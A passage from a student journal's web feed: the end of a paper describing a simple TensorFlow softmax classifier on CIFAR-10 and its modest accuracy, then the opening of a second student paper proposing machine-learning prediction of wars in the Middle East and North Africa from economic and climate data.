<p><br>Despite ethical and scientific obstacles, image recognition technology has advanced tremendously. In computer vision, this is basically the result of generalization; in highly controlled conditions, most models are unable to replicate variations in illumination, perspective, and occlusion [10]. Finally, training complex models requires enormous quantities of data and processing power, which makes scaling extremely difficult in contexts with limited resources [10]. There are ethical concerns as well, particularly with regard to face recognition technology, which has difficulties with algorithmic bias, privacy, and data security [10]. Social concerns about the use of AI in sensitive areas may arise from bias in training sets, which may provide discriminatory results, especially when algorithms perform poorly for specific demographic groups [10]. &nbsp;</p>



<h4 class="wp-block-heading">1.4 <strong>Future Directions in Image Recognition Research</strong></h4>



<p>It is likely that future image recognition research will focus on learning algorithms that work better with less supervised examples using methods like semi-supervised and unsupervised learning [11]. We will investigate techniques like Generative Adversarial Networks (GANs) for creating realistic training data in order to address the issue of scarce data and strengthen models [11]. To put it briefly, image recognition is the state-of-the-art in AI research, using scientific advancements to enable machines to understand the visual world and providing enormous transformational potential in a variety of scientific and industrial applications.</p>



<h2 class="wp-block-heading"><strong>2. Implementation</strong></h2>



<p>One of the key elements of picture classification models and much more crucial for deep learning architectures is the softmax classifier, which carries out the last activation function, which converts neural network outputs into probability distributions across several classes. The softmax function may be expressed mathematically as taking the exponential numbers of each significance, or &#8220;logit,&#8221; that emerges from the final segment of the network and normalizing them by adding them together. The outputs are successfully scaled to provide a probability distribution that may be used for multi-class classification since the probabilities of each class sum up to one. The softmax classifier gives a probability to each potential class for every given input picture, with the highest possibility denoting its forecast of the model for the most likely class.</p>



<p>When it came to providing a stochastic understanding for the output that would be helpful in measuring the model&#8217;s confidence, the softmax classifier proved to be highly helpful to the models, particularly those trained on multi-class datasets like CIFAR-10[2] or ImageNet. In order to quantify the distinction between the predicted and true probability distributions (instantaneous matrix for the true label), softmax is employed in conjunction with a loss of cross entropy during training. This indicates that by iteratively lowering the loss, the model increases its classification accuracy. The majority of typical image classification tasks are successfully completed by softmax classifiers, however they might perform appallingly when inputs are unclear or classes overlap. Therefore, thermo scaling or other calibration techniques are occasionally used in order to make the output distributions from softmax less confident and more interpretable in real-world applications.</p>



<p>Specifically designed to train artificial intelligence models on classification of images problems, CIFAR-10[2] has become one of the most widely used benchmarking in computer vision. Divided into 10,000 test pictures and 50,000 training images, CIFAR-10[2] is a rigorous method of assessing model performance. It consists of 60,000 color images with a pixel size of 32&#215;32. The set&#8217;s images are hand-labeled into 10 mutually exclusive classes: trucks, cars, frogs, horses, birds, dogs, cats, deer, aircraft, and cars. Because these classes cover a wide range of object categories, CIFAR-10 [2]is a good tool for evaluating how effectively models generalize across different visual attributes.</p>



<p>One of CIFAR-10&#8217;s intriguing aspects is its very low picture resolution, which pushes models to extract pertinent features from a small number of pixels. This affects feature extraction capacity rather than high resolution (HR) detail gathering. Because CNNs are adept at spotting hierarchy of space in visual data, it is therefore particularly useful for assessing them. To improve sample diversity and prevent overfitting, the CIFAR-10 dataset is frequently enhanced during training using methods including cropping, horizontal flipping, and even color jittering. Additionally, the categorical character of the dataset would easily fit with the usage of probability-based classifying metrics like cross-entropy loss in networks with a softmax output layer. CIFAR-10 is a typical dataset used in machine learning research.</p>



<h4 class="wp-block-heading"><strong>2.1: Explaining the code</strong></h4>



<p>This code implements a softmax classifier for the CIFAR-10[2] dataset using TensorFlow&#8217;s[1] version 1 framework to perform image classification. First, it imports essential libraries and modules, including numpy for numerical operations, tensorflow.compat.v1 (with v2 features disabled for compatibility with older TensorFlow code), and a helper module data_helpers for loading the CIFAR-10[2] dataset. Basic parameters like batch size, learning rate, and number of training steps (max_steps) are defined for controlling the training process. The code begins by loading the CIFAR-10 dataset through data_helpers.load_data(), storing training and test images and labels.</p>



<p>The TensorFlow[1] computational graph is then defined, starting with placeholders for input images and labels. Each image is flattened to a vector of 3072 values (32x32x3), and there are 10 possible classes in the CIFAR-10[2] dataset. The classifier parameters consist of weights and biases, both initialized to zero, which will be optimized during training. The logits calculation (tf.matmul(images_placeholder, weights) + biases) represents the unnormalized scores for each class. The loss function, tf.nn.sparse_softmax_cross_entropy_with_logits, calculates the softmax cross-entropy between logits and true labels, producing a mean loss over the batch. To minimize this loss, the GradientDescentOptimizer is used with the specified learning rate.</p>



<p>The model&#8217;s accuracy is determined by comparing predicted labels to true labels with tf.equal and averaging correct predictions over the batch. In the training loop, random mini-batches of images and labels are drawn, and the model&#8217;s accuracy is printed every 100 steps. After completing all training steps, the model’s accuracy on the test set is calculated and printed. Finally, the code measures and prints the total runtime of the script, making it easy to track the computational efficiency of the training process.</p>



<h4 class="wp-block-heading"><strong>2.2: Code execution</strong></h4>



<h5 class="wp-block-heading"><strong>2.2.1 Training Procedure</strong></h5>



<p>In training, the code employs a softmax classifier. A softmax classifier is a type of logistic regression model that is often deployed to handle multi-class classification problems. The different steps adopted during the training procedure are as follows:</p>



<p>Initialization of Weights: At the first step, we initialize the weights and biases for softmax classifiers (usually small random values or zeros). The weights will thus represent the &#8220;knowledge&#8221; of the model and will be set appropriately later during training for best performance</p>



<p>Forward pass: The model produces predictions for each input batch of images by taking the sum of the weighted inputs followed by application of softmax activation for generating probabilities for each class. In other words, it&#8217;s essentially assigning a probability to each class-&#8220;dog,&#8221; &#8220;cat,&#8221; and so on in CIFAR-10[2]-for each image.</p>



<p>Loss Calculation: The code makes use of a loss function-a so-called cross entropy which measures how well the model&#8217;s predicted probability of the class labels compares to the actual probabilities of the class labels. The value of loss is high if there is a big difference between the predictions and the correct answers vice versa.</p>



<p>Backpropagation and Gradient Descent: The model calculates the gradients, which specify how the weights should be updated to minimize the loss. Then, it uses gradient descent to update the weights, analogous to the series of small steps toward reducing the error. In this code, we will use tf.train.GradientDescentOptimizer to carry out these updates. The learning rate is step size; a small learning rate brings slower learning whereas a large learning rate might induce instability.</p>



<p>Monitoring Accuracy: The program outputs the training accuracy every 100 steps. Training accuracy is the percentage of accurate predictions on the training dataset at every step. Here&#8217;s how it goes:</p>



<p>Step 0: Training accuracy starts very low at 0.07 (7%), meaning the model is nearly just guessing.</p>



<p>This gradually increases at each step to about 0.43 (43%) at step 900, indicating it is learning, though the improvement is quite slow, which is expected of a simple softmax model on such a complex dataset.</p>



<p>The learning curve with respect to the increase in training accuracy is a gentle ascent as the model learns, adjusting its weights based on the training data to improve class label predictions. However, the final training accuracy is still less than 50% and hence indicates that the model is not effective enough to fit the data accurately in comparison with the complexity of the CIFAR-10 data set, perhaps because of the simplicity of the softmax model against the complexity of the CIFAR-10[2] data set.</p>



<h5 class="wp-block-heading"><strong>2.2.2 Test Accuracy</strong>&nbsp;</h5>



<p>After the training process, the code tests the model on the test dataset, composed of images the model has not encountered while training. Then it can figure out if the model is good at generalizing well to new data. The final test accuracy of this output is 0.265 or 26.5%, meaning the model classifies only approximately 26.5% of the images in the test correctly.</p>



<p>Most probably the reason for this very low test accuracy is</p>



<p>Model Simplicity: A softmax classifier is a fairly simple linear model, though it really works fine for linearly separable data. However, it does not work well when the patterns become more complex. The CIFAR-10 collection contains 10 diverse categories of low-resolution images that require more advanced feature extraction.</p>



<p>Overfitting Risk: Although this result does not indicate overfitting, if the training accuracy were much higher than the test accuracy, that would indicate that the model is overfitting (memorizing training data instead of generalizing). In the present case, both training and test accuracies are low, and this could indicate underfitting-the model hasn&#8217;t captured enough of the data patterns.</p>



<p>More complex models than a softmax classifier, for example, CNNs, are often required to handle spatial patterns in the case of CIFAR-10 and deliver better performance.</p>



<h5 class="wp-block-heading"><strong>2.2.3 Execution Time</strong></h5>



<p>The execution time shown here is 5.77 seconds, which represents the time taken by this model to train and evaluate completely on the CPU. Here are some reasons for this time:</p>



<p>Model Complexity: A softmax classifier has relatively little complexity; therefore, the computation needs are less compared with a complex model like CNN or deep neural nets. This moderate complexity keeps the training short in time.</p>



<p>The code emits a warning that it doesn&#8217;t use certain CPU features (like AVX2, AVX) that could accelerate the processing. Meaning, the code could possibly have run faster if TensorFlow[1] had been optimized for the available hardware. But even without any such optimizations, the lightweight model finishes training fast.</p>



<p>Batch Size and Number of Steps: Because the size of the data processed per step and the number of steps (in this case, 1000) also determine execution time, a large number of them may be converged much faster but demand more memory. Small batch sizes make the training much slower but more stable.</p>



<p>It has an advantage in short training times for speed experiments but suffers at the expense of lower accuracy on such a complex dataset like CIFAR-10.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="223" src="https://exploratiojournal.com/wp-content/uploads/2024/12/image-8-1024x223.png" alt="" class="wp-image-4096" srcset="https://exploratiojournal.com/wp-content/uploads/2024/12/image-8-1024x223.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-8-300x65.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-8-768x167.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-8-1000x217.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-8-230x50.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-8-350x76.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-8-480x104.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-8.png 1242w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Figure 1: output from the execution</em></figcaption></figure>



<h2 class="wp-block-heading"><strong>3. Discussion</strong></h2>



<p>Overall, submerging myself into the world of image classification has been an extremely enlightening, exciting, and complex experience. The journey started with understanding some basics in this field- what image classification was and how it all works behind the scenes. Essentially, teaching a computer to recognize and categorize images based on the various classes it belongs in, is made up of a good deal of programming, mathematics, and a good amount of machine learning.</p>



<p>This was going to take me into the rather complex process of compiler building, ensuring that the code is run efficiently and supports the different operations needed in activities such as image classification. It was observed that one needs to work with a variety of data-sets to understand which ones train the model and which ones are for testing and how it all impacts on the resulting accuracy or applicability of the model.</p>



<p>The other aspect of this journey involved learning how to load and preprocess data correctly. Handling datasets gets pretty complex at times, but I learned how to streamline the process so that my workflow is really smooth. It was after this foundation that The challenge was undertaken to of developing my own image classifier.</p>



<p>It was an experience with rich challenges and rewards building the image classifier from scratch. This required foundational concepts and how to apply them in practice. This process demonstrated to be methodical about solving problems, think critically, especially when debugging issues, exploring different architectures, and fine-tuning my model, and this is what gave me the great feeling of the first time that my model started making correct predictions.</p>



<p>This study has yielded significant insights as part of my learning journey. This study provided deeper insights into machine learning and programming, and this has made me feel even stronger about the complexity of problems in technology. Future work will focus on building on this platform and diversifying further into more profound concepts, and not merely applying the gained knowledge to real-world problems. The prospects are endless, and It is anticipated that where this journey will take me.&nbsp;</p>



<p>Mastering the art of image classification was, in no way, smooth-sailing. It was necessary to spend a lot of time to grasp the concepts and mechanics underlying it. The process begins with developing a softmax classifier, guided by a tutorial from a website. This is a pretty straightforward stage, though it started the ball rolling in understanding the true nature of the process and establishing a basis for an eventual good performance.</p>



<p>Significant changes occurred when when An attempt was made to build my own image classifier. The task was both complex and engaging but also at times overwhelming and demanding. The most difficult part was having to integrate the CIFAR-10 dataset with custom labels. That really put me in extreme conditions and tested all my problem-solving skills.</p>



<p>Although there were some hitches here and there, struggle seemed worth every moment because it was very rewarding to overcome the obstacles; learning something which I had always wanted to learn made the experience worthwhile. Some aspects, such as the softmax classifier, were easier to handle, but as a whole, the process taught me how resilient and adaptable I could be and continues to sustain my passion to dig deeper into such topics.</p>



<h2 class="wp-block-heading"><strong>Conclusion</strong></h2>



<p>This paper in detail describes what steps occur to develop and apply a softmax classifier for image classification work, using the CIFAR-10 dataset. Image classification is one of the main applications of neural networks, translating visual data into actionable insights. It plays a massive role in industries such as healthcare, security, and autonomous systems, so improving decision-making and operational efficiency requires its effectiveness.</p>



<p>At the same time, it begins from the very start with the fundamental concepts of image classification, basically understanding visual data. Deep learning models, like CNN, are significant contenders in advancements in image classification. CNNs can detect spatial hierarchies in images starting from low-level features, such as edges, going into a complex structure, such as objects. Vision transformers, or ViTs, are an emerging technique using a self-attention mechanism for capturing global context, sometimes even outperforming CNNs when applied to large datasets.</p>



<p>CIFAR-10 is the benchmark dataset for models used in image classification. It comprises 60,000 images at low resolution, divided across 10 mutually exclusive classes: airplanes, cars, animals, grouped into 50,000 training and 10,000 test images. Low-resolution data sets make it hard for the model to draw meaningful features from small visual data sets. Often, data augmentation techniques like cropping, flipping, or color jittering are applied to add diversity in the training process and counter overfitting.</p>



<p>The softmax classifier is an integral component of this image classification framework: the outputs of the neural network are converted into probability distributions of multiple classes. Here, the softmax function normalizes those outputs so that the sum of the probabilities of all classes equals one, making it likely to be a class for each input. At training time, this classifier measures the difference between predicted and actual probabilities with cross-entropy loss functions and iteratively adjusts weights to be able to increase accuracy of the decision.</p>



<p>All of the softmax classifier code is written completely structured with TensorFlow. It includes the initialization of weights and biases, forward pass to produce class probabilities, computing loss, and updating the weight using gradient descent. In training the model, batches of images are pushed forward while monitoring accuracy at intervals and continuously refining the weights. Even though this method has many complexities to it, this is the core method from which one gets foundational insights into image classification workflows.</p>



<p>This can be considered a case of the softmax classifier on the CIFAR-10 dataset; however, there are immense limitations toward this model. A model-wise perspective shows how, by 1,000 training steps, it represented an accuracy of 43% on the training and only 26.5% on the test. These figures mark indicators that the model failed to incorporate the complexity this dataset may feature, considering its linearly based approach. Well-suited for some simpler tasks, the softmax classifier cannot handle those datasets requiring much more advanced feature extraction.</p>



<p>The challenges faced in the process of this project were underfitting &#8211; which is when the models fail to generalize patterns-and then custom labels to add on dataset difficulties. These really highlighted the idea of further complex models like CNN, which is further superior for dealing with any type of complex data. Moreover, the images of CIFAR-10 are at a lower resolution, making it more challenging, forcing the model to extract relevant feature from the limited pixel space.</p>



<p>The project addressed issues of ethical and computational challenges in image recognition. Issues ranged from algorithmic bias, privacy concerns, to the need for a large quantity of labeled data and computational powers. Some of these issues are reflected in the highlighted point that illustrates the need for developing scalable, bias-free algorithms applicable in real-world applications.</p>



<p>Despite these restrictions, this project provided some very valuable learning opportunities. This experience of building and testing a softmax classifier brings insight into many real-world aspects of image classification. It brought up the importance of iterative optimization, the difficulty of dealing with complex datasets, and the promise more advanced techniques hold in bettering accuracy.</p>



<p>Future work in image classification could include use of semi-supervised and unsupervised learning to decrease dependencies of training data. Techniques such as GANs can be used to produce synthetic training data and thus eliminate the problem of scarcity of available data. In addition, integrating CNNs or more advanced architectures for such architectures as vision transformers may further enhance performance for data sets like CIFAR-10.</p>



<p>Conclusion This project is at once a learning experience and a stepping stone into further research in the areas of computer vision. There being limitations to such simpler models that exist and having found ways to upgrade those opens the doors to more robust and effective image-classification solutions. Lessons learned here don&#8217;t go beyond academic lines but already carry high applicability in practice in medical care, autonomous systems, or security industries that work with visual data analysis.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="683" src="https://exploratiojournal.com/wp-content/uploads/2024/12/image-9-1024x683.png" alt="" class="wp-image-4142" srcset="https://exploratiojournal.com/wp-content/uploads/2024/12/image-9-1024x683.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-9-300x200.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-9-768x512.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-9-1000x667.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-9-230x153.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-9-350x233.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-9-480x320.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-9.png 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 1: Training and Test Accuracy over Time Using a Softmax Classifier on CIFAR-10 Dataset</figcaption></figure>



<p></p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Metric</td><td>Value</td><td>Dataset</td><td>Notes</td></tr><tr><td>Training Accuracy</td><td>43%</td><td>Training Set</td><td>After 1000 steps</td></tr><tr><td>Test Accuracy</td><td>26.5%</td><td>Test Set</td><td>Indicates underfitting</td></tr><tr><td>Execution Time</td><td>5.77 seconds</td><td>Full Process</td><td>On CPU, unoptimized</td></tr></tbody></table><figcaption class="wp-element-caption">Table 1: Model Performance Metrics</figcaption></figure>



<p></p>



<h2 class="wp-block-heading"><strong>Citations</strong></h2>



<p><strong>[1] </strong><a href="https://www.tensorflow.org/tutorials/images/classification"><strong>https://www.tensorflow.org/tutorials/images/classification</strong></a><strong>&nbsp;</strong></p>



<p><strong>[2]</strong><a href="https://www.cs.toronto.edu/~kriz/cifar.html"><strong>https://www.cs.toronto.edu/~kriz/cifar.html</strong></a></p>



<p><strong>[3]</strong><a href="https://www.tandfonline.com/doi/full/10.1080/01431160600746456"><strong>https://www.tandfonline.com/doi/full/10.1080/01431160600746456</strong></a></p>



<p><strong>[4]</strong><a href="https://ieeexplore.ieee.org/abstract/document/4309314"><strong>https://ieeexplore.ieee.org/abstract/document/4309314</strong></a></p>



<p><strong>[5]</strong><a href="https://www.superannotate.com/blog/image-classification-basics"><strong>https://www.superannotate.com/blog/image-classification-basics</strong></a></p>



<p><strong>[6]</strong><a href="https://viso.ai/computer-vision/image-classification/"><strong>https://viso.ai/computer-vision/image-classification/</strong></a></p>



<p><strong>[7]</strong><a href="https://www.tensorflow.org/tutorials"><strong>https://www.tensorflow.org/tutorials</strong></a></p>



<p><strong>[8]</strong><a href="https://pyimagesearch.com/2016/09/12/softmax-classifiers-explained/"><strong>https://pyimagesearch.com/2016/09/12/softmax-classifiers-explained/</strong></a></p>



<p><strong>[9]</strong><a href="https://www.freecodecamp.org/news/how-to-build-a-simple-image-recognition-system-with-tensorflow-part-1-d6a775ef75d/"><strong>https://www.freecodecamp.org/news/how-to-build-a-simple-image-recognition-system-with-tensorflow-part-1-d6a775ef75d/</strong></a></p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Sarikonda Grishmanth Reddy</h5><p>Sarikonda is an enthusiastic computer science student with a special interest in artificial intelligence, machine learning, and image classification. His academic path so far has been driven by an interest to discover new technologies and pursue a practical approach toward solving problems in real life. Beyond academics, Sarikonda heads the boys&#8217; hostel in his college as a Head Boy, and this has been honed to develop leadership and organizational skills. He also participates in planning and executing various social and charitable events, which has given him an opportunity to believe in the sentiments of community and serve society.
</p></figure></div>



<p></p>
<p>The post <a href="https://exploratiojournal.com/a-journey-into-image-classification-developing-and-implementing-a-custom-image-classifier/">A Journey into Image Classification: Developing and implementing a custom image classifier</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Determining the Likelihood of War in a Country in the Middle East and North Africa Based on Economic and Climate Data via Machine Learning</title>
		<link>https://exploratiojournal.com/determining-the-likelihood-of-war-in-a-country-in-the-middle-east-and-north-africa-based-on-economic-and-climate-data-via-machine-learning/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=determining-the-likelihood-of-war-in-a-country-in-the-middle-east-and-north-africa-based-on-economic-and-climate-data-via-machine-learning</link>
		
		<dc:creator><![CDATA[Albert Liu]]></dc:creator>
		<pubDate>Tue, 01 Jul 2025 21:59:32 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<category><![CDATA[Social Sciences]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4102</guid>

					<description><![CDATA[<p>Albert Liu<br />
Jordan High School</p>
<p>The post <a href="https://exploratiojournal.com/determining-the-likelihood-of-war-in-a-country-in-the-middle-east-and-north-africa-based-on-economic-and-climate-data-via-machine-learning/">Determining the Likelihood of War in a Country in the Middle East and North Africa Based on Economic and Climate Data via Machine Learning</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong> Albert Liu<br><strong>Mentor</strong>: Tom Bertalan<br><em>Jordan High School</em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>War is a major issue in our current world, with 56 current conflicts around the world, the most since WWII. This is extremely concerning, as most people are not aware of most wars or coups that happen in different countries. A particularly unstable region in this age is the Middle East and North Africa. This study attempts to predict the onset of wars and coups in the MENA region by using economic and weather data and comparing it to other economic and weather data captured during times of conflict in these particular areas. A pipeline classification was built with weather and economic data from various time periods in places that were in a conflict at the time. Articles on events in these regions were also collected to gauge the situation at any given time. The model would then fit the data as well as the article features and output the likelihood of war in a particular area based on the economic and weather data it received. If we can predict wars and other conflicts before they can even happen, we can better prevent them, or decrease the casualty rate. While this is to some extent a report of work done, it is also a proposal for future work.</p>



<h2 class="wp-block-heading">1 Introduction</h2>



<p>Although wars and coups have occurred consistently throughout history, the frequency and intensity of such violent conflicts have notably increased in recent years. In 2021, there were 27 ongoing conflicts, with the number steadily rising every year (Koop 21; Rustard 24). Today, the world is experiencing the most conflicts and wars it has faced since WW2 (Archie 22). Although there are many terrible events happening around the world, affecting different countries everywhere, the general public only knows about a few of them, and most are unaware of how drastic they are.</p>



<p>Unfortunately, this also means that there isn’t too much news coverage and aid for the issues faced by countries experiencing lesser-known conflicts, as sometimes it gets too dangerous in certain areas for people to help (Burchell 2020). This model can be utilized to identify early indicators of unrest and the onset of conflict in specific regions, enabling proactive intervention to mitigate escalation. Ideally, specialists and humanitarian organizations would have the ability to anticipate areas at risk of instability, allowing for preemptive measures that reduce the potential for widespread harm. While there is a possibility that such a model could be misused by authoritarian parties to better monitor and suppress dissent, this risk can be managed with ethical oversight and responsible implementation. This paper demonstrates a program that could allow for the prediction of future conflicts in the MENA region using climate and economic data.</p>



<h2 class="wp-block-heading">2 Literature Review</h2>



<p>The purpose of this literature review is to determine which factors play an important role in causing conflict, and ways we can look for such factors in advance to prevent such events. Nations have declared war on other nations or groups for a variety of reasons. Some may have been more abstract, such as conflicts between religion or culture, while others were also more concrete reasons, such as the need more land, population, or resources. However, because of World War II, war and conflicts in general have changed irrevocably. Now conflicts are characterized by better surveillance technologies, with new inventions such as drones and more accurate weapons. They also tend to involve many civilians now, rather than just soldiers, and often involve various factions, some which aren’t state-affiliated. In this new post-World War II era, conflicts have started to be coined by US analysts as Fourth-Generation Warfare (Holbrook 20). This era has also seen a slow decline in foreign wars, yet the number of civil wars has started to rise, with the number of such conflicts having tripled since the last decade (von Einsiedel 2017).</p>



<p>A civil war, defined by Britannica, is a conflict that involves the clashing of multiple organized non-state actors, which differs from interstate, or foreign wars, which are wars declared on one nation by another. There are two wars that have the world’s attention currently, the Russo-Ukrainian and Israel-Palestinian Conflicts. Although some parties claim otherwise, both happen to be foreign wars, conflicts waged by one functional government against another. Although both are classified as interstate wars, their occurrence represents a deviation from the declining trend of foreign conflicts, and their prominence in global discourse can be attributed to their relative rarity compared to the numerous civil wars that commonly affect failed states.</p>



<p>Despite the fact that it seems as though there are a plethora of differences between the two types of conflicts, in Lemke and Cunningham’s 2009 paper, they come to the conclusion that there isn’t a point to making distinctions between the two. Despite this, distinguishing between the two types could provide more insight, and is something to look into. For now, though, research should instead prioritize evaluating their overall effectiveness as catalysts for conflict. Although there are a lot of different factors that could influence the decision to declare war, there isn’t a definitive determinant that inevitably leads to war. Since there isn’t one deciding factor as to why all conflicts start, many researchers attempt to search for one factor or a set of factors that have the biggest impact as to whether wars start or not.</p>



<p>According to Stewart (2002), war is strongly influenced by the economic is sues of a nation and its surrounding area at a given time. His research paper, ”Root causes of violent conflict in developing countries”, focuses on 4 big economic hypotheses, and how these factors could possibly contribute to the start of intra-state wars in the modern era: Group Motivation Hypothesis, Private Motivation Hypothesis, Failure of the Social Contract, and Green War Hypothesis. While the paper had very in depth information on how economics could cause such conflicts, it excludes many other factors, and doesn’t go into detail concerning political, religious, cultural, resource, geography, or climate related factors. Although economics undeniably plays a major part in the inner and foreign situation of a state, it shouldn’t be the only factor. Another thing that has changed between 2002 and the present day is the US’ involvement and policies regarding the Middle East region after 9/11 (Esfandiary 2021). Although this article was written post-9/11, it ignores big changes in the political landscape of the Middle East and before the true consequences of the US’ actions had been realized. Despite this, it still is applicable to some degree as the economic consequences mentioned in Stewart’s writings would still hold major influence in a nation’s stability and tendency to declare war.</p>



<p>Coccia (2019) explains many different theories that have been used to explain how and why wars happened. She elaborates on both historical and modern theories on the cause of war and conflict. Modern theories could explain or uncover a big part of why such conflicts happen, and the inclusion of past theories allows insight into how modern theories could have developed. The contents of the paper are mostly theoretical, finding reasons that countries would declare war and other theories relating to the nature of conflict. Although this paper focuses on foreign wars, and doesn’t mention the case of a civil war, it has still provided valuable information on why conflicts could happen, and the logic behind how they could start. Even after someone has determined what cause of war they want to further research, there are a variety of ways for them to find, categorize, and store the data they use.</p>



<p>In order to find reasons for involvement in wars, Makarov (2015) uses statistics. He takes data from times when a certain nation is either at war or in a time of peace. The paper considers political (e.g. diplomacy), economic, and religious factors that could influence the likelihood a country would be in a state of warfare. Once Makarov obtains the data, statistical models and distributions are used to then gather the data needed to build graphs and make projections of the previously mentioned factors and their effects. However, the way statistics are used in Makarov’s case differs from this paper’s approach to utilizing statistics and data. While Makarov mainly focuses his paper on why certain nations could be involved in wars, this paper attempts to facilitate prevention of such conflicts by picking up on trends that have been seen before and predicting the likelihood of conflict in a certain area.</p>



<h2 class="wp-block-heading">3 Methods</h2>



<p>This paper primarily examines the economic and climatic factors that contribute to the onset of war, analyzing their correlation with reported events in news articles. The model does this by utilizing features extracted from articles to assess the severity of conflict in a given region at a given time and integrates economic and climate data to evaluate their potential influence on the situation. Research from the UN shows that climate is important to consider as it could determine whether or not a country could face civil unrest, or even wage war against other nations. If a country has been facing climate that isn’t typical for the region over an extended period of time, it could cause an assortment of problems. In one report from the UN in 2021, they state that extreme weather and climate changes, along with other factors such as disease, have caused many droughts and subsequent food shortages for places such as Latin America, Asia, and Africa (UNFCCC 2021). There have been similar trends before and during the outbreak of war as well, with droughts and food shortages being caused by drastic climate change in a region. This could cause leaders to fight for precious resources or cause parts of the country to revolt against the central government. Economics could also be an important part to consider, as harsher economic times could cause unrest, and increase the chances of conflict, whether it be from disgruntled civilians or a government desperate to alleviate itself from these issues.</p>



<p>The code for the prediction model first gathers both economic and climate data, as well as articles and events corresponding to different times during the war. These data points are what the model later trains and tests on to gauge the accuracy of its results. This model is trained on data from the Darfur conflict and Syrian civil war occurring in Sudan and Syria respectively, although more conflicts in the region could be added for more complex and accurate predictions. In order to encode the articles into a readable state, qdrant’s FastEmbed, an embedding model was used to turn raw data (articles) into vectors from 1 to 1 using cosine similarity of article feature vectors (qdrant Version 0.6.0). The outputs/events, originally represented as strings (e.g. ’war’ or ’coups’), are transformed into k-hot encoded vectors to facilitate data visualization. This transformation employs a multi-label k-hot encoding approach, allowing for the representation of multiple events occurring within a single time period, thereby enhancing the clarity of the data.</p>



<p>Before training and testing the data, it is necessary to interpolate periods with no events or articles, or other data. The analysis period is defined from the earliest to the most recent data point, with all intervening empty time periods requiring interpolation to ensure data continuity. Grab-and-hold interpolation is used to fill in all dates with economic and climate data from previous data points. The empty time periods without economic or climate data will be interpolated with the values of the most recent time with data. In the event that datetime periods are requested earlier than the earliest economic or climate data point recorded, then all datetime periods before the first data point will be extrapolated with the values of that first data point. After all the datetimes with empty data have been filled in, the article features, economic data, and climate data are stacked and stored into a single array of features.</p>



<p>The classifier works by binning all dates into larger intervals. The original prediction model required daily data from the entire time span to make predictions, which resulted in long processing times and reduced accuracy due to repetitive values and interpolation-induced redundancy. To address this, the classifier utilizes a sliding window approach, aggregating data into one-week intervals. This method consolidates multiple days of data into a single time frame, enhancing both computational efficiency and model performance.</p>



<p>After the events and the features have been interpolated, a sliding window classifier with a Radial Basis Function kernel is trained to predict the possibility of conflicts in certain regions.</p>



<h2 class="wp-block-heading">4 Results</h2>



<p>Climate, and to a smaller extent weather, plays a big factor in the likelihood of conflict, as it could affect resource scarcity (crops and water), and economic prosperity, etc. To understand the effects of changing climate and deviations in the average temperature on the occurrence of conflicts.</p>



